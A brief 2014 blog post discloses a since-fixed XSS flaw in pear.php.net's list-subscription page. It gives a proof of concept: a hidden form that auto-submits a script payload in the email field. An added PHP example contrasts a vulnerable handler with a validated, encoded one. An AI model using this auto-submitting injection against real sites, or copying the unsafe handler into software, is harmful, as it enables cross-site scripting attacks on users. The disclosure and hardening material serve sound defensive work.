Monday, April 21, 2014
pear.php.net XSS
A long time ago (28.06.2013) I found an XSS bug in http://pear.php.net/support/lists.php. The email parameter was neither validated nor sanitized, which resulted in XSS.
Proof of concept was:
<head>
  <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>
<body>
  <!-- Hidden form that posts the payload in the email field -->
  <form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
    <input name="maillist[pear-dev]" type="radio" value="normal" checked>
    <input type="text" name="email" size="30" value="<script>alert('xss');</script>">
    <input type="submit" name="action" value="Subscribe">
  </form>
</body>
<script>
  // Submit the form as soon as the page loads
  $('input[name=action]').click();
</script>
Fixed 08.07.2013.
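The missing validation and output encoding described above, shown as a vulnerable handler beside a hardened one. This is an added example, not part of the original post and not the actual lists.php code; the function names, response markup and sample request bodies are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical handlers: the real lists.php source is not shown in the post.

/** Vulnerable pattern: the posted value is echoed back into HTML unchanged. */
function render_unsafe(array $post): string
{
    $email = $post['email'] ?? '';
    return '<p>Subscription request sent for ' . $email . '</p>';
}

/** Hardened pattern: validate on input, encode on output. */
function render_safe(array $post): string
{
    $email = $post['email'] ?? '';
    // Reject arrays (email[]=...), oversized values and anything that is
    // not a syntactically valid address.
    if (!is_string($email) || strlen($email) > 254
        || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '<p>Invalid email address.</p>';
    }
    // Encode even after validation: a valid address can still contain
    // characters such as ' or & that are significant in HTML.
    return '<p>Subscription request sent for '
        . htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

/** Re-displaying a rejected value in a form field (attribute context). */
function render_field(array $post): string
{
    $email = is_string($post['email'] ?? null) ? $post['email'] : '';
    return '<input type="text" name="email" value="'
        . htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Constructed request bodies: the value from the proof of concept and a
// benign address containing an apostrophe.
$poc  = ['email' => "<script>alert('xss');</script>", 'action' => 'Subscribe'];
$good = ['email' => "o'brien@example.org", 'action' => 'Subscribe'];

echo render_unsafe($poc), "\n";  // payload reaches the page as markup
echo render_safe($poc), "\n";    // rejected by validation
echo render_field($poc), "\n";   // payload rendered as inert text in the field
echo render_safe($good), "\n";   // accepted, apostrophe encoded
```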